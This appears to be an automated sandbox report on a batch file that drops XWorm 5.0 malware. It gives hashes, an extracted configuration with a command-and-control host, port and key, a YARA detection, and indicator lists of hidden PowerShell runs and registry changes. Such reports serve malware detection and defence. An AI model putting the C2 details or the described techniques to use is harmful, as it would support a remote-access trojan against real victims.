Analysis
-
max time kernel
1799s -
max time network
1797s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
26-05-2024 14:58
Static task
static1
Behavioral task
behavioral1
Sample
FN-INTERNAL.bat
Resource
win10v2004-20240426-en
General
-
Target
FN-INTERNAL.bat
-
Size
376KB
-
MD5
121a69448e9f5eef0ba4c1229b471208
-
SHA1
90abf42b20fb75a7f922b4a83cbeb77ca5dbf5d0
-
SHA256
b383a0ab3670e505ae0b7a7b6d68c096bb799ce858d8afc2e2ef5d1c1314051a
-
SHA512
c9e903245c3ab434018e23e4c51bf9d4fcbdb9dc1b85114574c12a2ce5c3ec6cd811fa1b51a34c86c695c6ba79cade1cdc215c4953090a342ba4ff6c1a92bc3d
-
SSDEEP
6144:C+g8ai0m+BiS0FY9tRpUOAIeJxsOjzW1JlW5nHa5EV8hpzjHRQbh9xph9aK7PGaj:C+gdOSOYbRHjeJxbOJlW5niJSdT9amGk
Malware Config
Extracted
xworm
5.0
software-led.gl.at.ply.gg:38954
m6tgeOEIIMDuaFcQ
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1700-132-0x000001EC9C1F0000-0x000001EC9C1FE000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 37 1700 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2088 powershell.exe 1700 powershell.exe 2916 powershell.exe 4464 powershell.exe 3552 powershell.exe 2532 powershell.exe 1992 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
ComputerDefaults.exepid process 3816 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
Processes:
ComputerDefaults.exepid process 3816 ComputerDefaults.exe -
Drops file in System32 directory 14 IoCs
Processes:
svchost.exesvchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File created C:\Windows\system32\SleepStudy\user-not-present-trace-2024-05-26-15-07-36.etl svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\SleepStudy\user-not-present-trace-2024-05-26-15-07-36.etl svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies data under HKEY_USERS 43 IoCs
Processes:
svchost.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018800ED45CF5E2" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe -
Modifies registry class 64 IoCs
Processes:
svchost.exeExplorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\NcsiUwpApp_8wekyb3d8bbwe\HAM\AUI svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612094667190917" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133612097191077957" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\NcsiUwpApp_8wekyb3d8bbwe svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612094325472238" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133612096563878245" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\NcsiUwpApp_8wekyb3d8bbwe\HAM\AUI\App\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612106777639845" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612094298128567" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133612098369359150" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612093632503571" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612094343284709" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612093648597170" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612093980159877" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612093963440964" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 50003100000000009a58ef6c100041646d696e003c0009000400efbe9a586864ba5843782e00000080e1010000000100000000000000000000000000000016ca2500410064006d0069006e00000014000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612106843577540" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612093343440860" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612094671565926" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612094313284951" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612094670316119" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\NodeSlot = "2" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133612097762483688" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\NcsiUwpApp_8wekyb3d8bbwe\HAM\AUI\App svchost.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Explorer.EXEpid process 3460 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2088 powershell.exe 2088 powershell.exe 2532 powershell.exe 2532 powershell.exe 1700 powershell.exe 1700 powershell.exe 1992 powershell.exe 1992 powershell.exe 1992 powershell.exe 2916 powershell.exe 2916 powershell.exe 840 powershell.exe 840 powershell.exe 2916 powershell.exe 840 powershell.exe 4464 powershell.exe 4464 powershell.exe 4464 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 840 powershell.exe 840 powershell.exe 840 powershell.exe 1700 powershell.exe 1700 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
Explorer.EXEpowershell.exepid process 3460 Explorer.EXE 1700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
